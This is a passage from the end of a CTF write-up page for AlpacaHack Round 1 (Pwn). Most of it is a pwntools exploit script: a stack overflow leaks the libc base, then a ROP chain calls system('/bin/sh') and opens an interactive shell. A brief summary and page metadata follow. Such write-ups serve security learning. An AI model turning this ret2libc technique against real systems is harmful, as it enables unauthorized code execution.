punctuation\">)</span>\n\npayload <span class=\"token operator\">=</span> <span class=\"token string\">b\"+\"</span><span class=\"token operator\">*</span><span class=\"token number\">0x118</span>\npayload <span class=\"token operator\">+=</span> <span class=\"token 
string\">b\" \"</span>\npayload <span class=\"token operator\">+=</span> rop_ret\npayload <span class=\"token operator\">+=</span> <span class=\"token string\">b\" \"</span>\npayload <span class=\"token operator\">+=</span> <span class=\"token string\">\" \"</span><span class=\"token punctuation\">.</span>join<span class=\"token punctuation\">(</span><span class=\"token punctuation\">[</span><span class=\"token string-interpolation\"><span class=\"token string\">f\"</span><span class=\"token interpolation\"><span class=\"token punctuation\">{</span>x<span class=\"token punctuation\">:</span><span class=\"token number\">0</span><span class=\"token punctuation\">{</span><span class=\"token number\">2</span><span class=\"token punctuation\">}</span>X<span class=\"token punctuation\">}</span></span><span class=\"token string\">\"</span></span> <span class=\"token keyword\">for</span> x <span class=\"token keyword\">in</span> p64<span class=\"token punctuation\">(</span><span class=\"token number\">0x401322</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>encode<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\npayload <span class=\"token operator\">+=</span> <span class=\"token string\">b\"+\"</span><span class=\"token operator\">*</span><span class=\"token number\">0x8</span>\n\n<span class=\"token comment\"># Exploit</span>\ntarget<span class=\"token punctuation\">.</span>recvuntil<span class=\"token punctuation\">(</span><span class=\"token string\">b\"Size: \"</span><span class=\"token punctuation\">)</span>\ntarget<span class=\"token punctuation\">.</span>sendline<span class=\"token punctuation\">(</span><span class=\"token builtin\">str</span><span class=\"token punctuation\">(</span><span class=\"token number\">0x118</span><span class=\"token operator\">+</span><span class=\"token number\">8</span><span 
class=\"token operator\">+</span><span class=\"token number\">8</span><span class=\"token operator\">+</span><span class=\"token number\">8</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>encode<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n\ntarget<span class=\"token punctuation\">.</span>recvuntil<span class=\"token punctuation\">(</span><span class=\"token string\">b\"Data (hex): \"</span><span class=\"token punctuation\">)</span>\ntarget<span class=\"token punctuation\">.</span>sendline<span class=\"token punctuation\">(</span>payload<span class=\"token punctuation\">)</span>\n\nr <span class=\"token operator\">=</span> target<span class=\"token punctuation\">.</span>recvline_startswith<span class=\"token punctuation\">(</span><span class=\"token string\">\"Received\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>decode<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>split<span class=\"token punctuation\">(</span><span class=\"token string\">\" \"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">[</span><span class=\"token number\">1</span><span class=\"token punctuation\">:</span><span class=\"token operator\">-</span><span class=\"token number\">1</span><span class=\"token punctuation\">]</span>\n\nlibc_start_main_ret <span class=\"token operator\">=</span> <span class=\"token builtin\">int</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"0x\"</span> <span class=\"token operator\">+</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">.</span>join<span class=\"token punctuation\">(</span>r<span class=\"token punctuation\">[</span><span class=\"token number\">296</span><span class=\"token punctuation\">:</span><span class=\"token 
number\">296</span><span class=\"token operator\">+</span><span class=\"token number\">8</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span><span class=\"token punctuation\">:</span><span class=\"token punctuation\">:</span><span class=\"token operator\">-</span><span class=\"token number\">1</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span><span class=\"token number\">16</span><span class=\"token punctuation\">)</span>\nlibc_base <span class=\"token operator\">=</span> libc_start_main_ret <span class=\"token operator\">-</span> <span class=\"token number\">0x29d90</span>\n<span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span><span class=\"token builtin\">hex</span><span class=\"token punctuation\">(</span>libc_start_main_ret<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n\n\n<span class=\"token comment\"># Stage 2</span>\nrop_str_bin_sh <span class=\"token operator\">=</span> <span class=\"token string\">\" \"</span><span class=\"token punctuation\">.</span>join<span class=\"token punctuation\">(</span><span class=\"token punctuation\">[</span><span class=\"token string-interpolation\"><span class=\"token string\">f\"</span><span class=\"token interpolation\"><span class=\"token punctuation\">{</span>x<span class=\"token punctuation\">:</span><span class=\"token number\">0</span><span class=\"token punctuation\">{</span><span class=\"token number\">2</span><span class=\"token punctuation\">}</span>X<span class=\"token punctuation\">}</span></span><span class=\"token string\">\"</span></span> <span class=\"token keyword\">for</span> x <span class=\"token keyword\">in</span> p64<span class=\"token punctuation\">(</span>libc_base<span class=\"token operator\">+</span><span class=\"token number\">0x1d8678</span><span class=\"token punctuation\">)</span><span class=\"token 
punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>encode<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\nrop_pop_rdi_ret <span class=\"token operator\">=</span> <span class=\"token string\">\" \"</span><span class=\"token punctuation\">.</span>join<span class=\"token punctuation\">(</span><span class=\"token punctuation\">[</span><span class=\"token string-interpolation\"><span class=\"token string\">f\"</span><span class=\"token interpolation\"><span class=\"token punctuation\">{</span>x<span class=\"token punctuation\">:</span><span class=\"token number\">0</span><span class=\"token punctuation\">{</span><span class=\"token number\">2</span><span class=\"token punctuation\">}</span>X<span class=\"token punctuation\">}</span></span><span class=\"token string\">\"</span></span> <span class=\"token keyword\">for</span> x <span class=\"token keyword\">in</span> p64<span class=\"token punctuation\">(</span>libc_base<span class=\"token operator\">+</span><span class=\"token number\">0x1bbea1</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>encode<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\nrop_system <span class=\"token operator\">=</span> <span class=\"token string\">\" \"</span><span class=\"token punctuation\">.</span>join<span class=\"token punctuation\">(</span><span class=\"token punctuation\">[</span><span class=\"token string-interpolation\"><span class=\"token string\">f\"</span><span class=\"token interpolation\"><span class=\"token punctuation\">{</span>x<span class=\"token punctuation\">:</span><span class=\"token number\">0</span><span class=\"token punctuation\">{</span><span class=\"token number\">2</span><span class=\"token punctuation\">}</span>X<span class=\"token 
punctuation\">}</span></span><span class=\"token string\">\"</span></span> <span class=\"token keyword\">for</span> x <span class=\"token keyword\">in</span> p64<span class=\"token punctuation\">(</span>libc_base<span class=\"token operator\">+</span><span class=\"token number\">0x50d70</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>encode<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n\npayload <span class=\"token operator\">=</span> <span class=\"token string\">b\"+\"</span><span class=\"token operator\">*</span><span class=\"token number\">0x118</span>\npayload <span class=\"token operator\">+=</span> <span class=\"token string\">b\" \"</span>\npayload <span class=\"token operator\">+=</span> rop_ret\npayload <span class=\"token operator\">+=</span> <span class=\"token string\">b\" \"</span>\npayload <span class=\"token operator\">+=</span> rop_pop_rdi_ret\npayload <span class=\"token operator\">+=</span> <span class=\"token string\">b\" \"</span>\npayload <span class=\"token operator\">+=</span> rop_str_bin_sh\npayload <span class=\"token operator\">+=</span> <span class=\"token string\">b\" \"</span>\npayload <span class=\"token operator\">+=</span> rop_system\npayload <span class=\"token operator\">+=</span> <span class=\"token string\">b\"+\"</span><span class=\"token operator\">*</span><span class=\"token number\">0x30</span>\n\ntarget<span class=\"token punctuation\">.</span>recvuntil<span class=\"token punctuation\">(</span><span class=\"token string\">b\"Size: \"</span><span class=\"token punctuation\">)</span>\ntarget<span class=\"token punctuation\">.</span>sendline<span class=\"token punctuation\">(</span><span class=\"token builtin\">str</span><span class=\"token punctuation\">(</span><span class=\"token number\">0x118</span> <span class=\"token operator\">+</span> <span class=\"token 
number\">0x30</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>encode<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n\ntarget<span class=\"token punctuation\">.</span>recvuntil<span class=\"token punctuation\">(</span><span class=\"token string\">b\"Data (hex): \"</span><span class=\"token punctuation\">)</span>\ntarget<span class=\"token punctuation\">.</span>sendline<span class=\"token punctuation\">(</span>payload<span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># Finish exploit</span>\ntarget<span class=\"token punctuation\">.</span>interactive<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\ntarget<span class=\"token punctuation\">.</span>clean<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span></code></pre></div>\n<h2 id=\"summary\" style=\"position:relative;\">Summary</h2>\n<p>I finally got around to writing this long-delayed writeup for AlpacaHack Round 1 (Pwn).</p>\n<p>I had planned to write up the remaining two challenges as well, but I ran out of energy, so for now I only covered these two.</p>","fields":{"slug":"/ctf-alpaca-round1-pwn-en","tagSlugs":["/tag/ctf-en/","/tag/pwn-en/","/tag/english/"]},"frontmatter":{"date":"2024-10-19","description":"Writeup for AlpacaHack Round 1 
(Pwn) - Part 1.","tags":["CTF (en)","Pwn (en)","English"],"title":"AlpacaHack Round 1 (Pwn) Writeup - Part 1","socialImage":{"publicURL":"/static/8bb83cd7249ab55c8b578e956d2bd8a1/ctf-hitcon-ctf-2024-antivirus.png"}}}},"pageContext":{"slug":"/ctf-alpaca-round1-pwn-en"}},"staticQueryHashes":["251939775","401334301","825871152"]}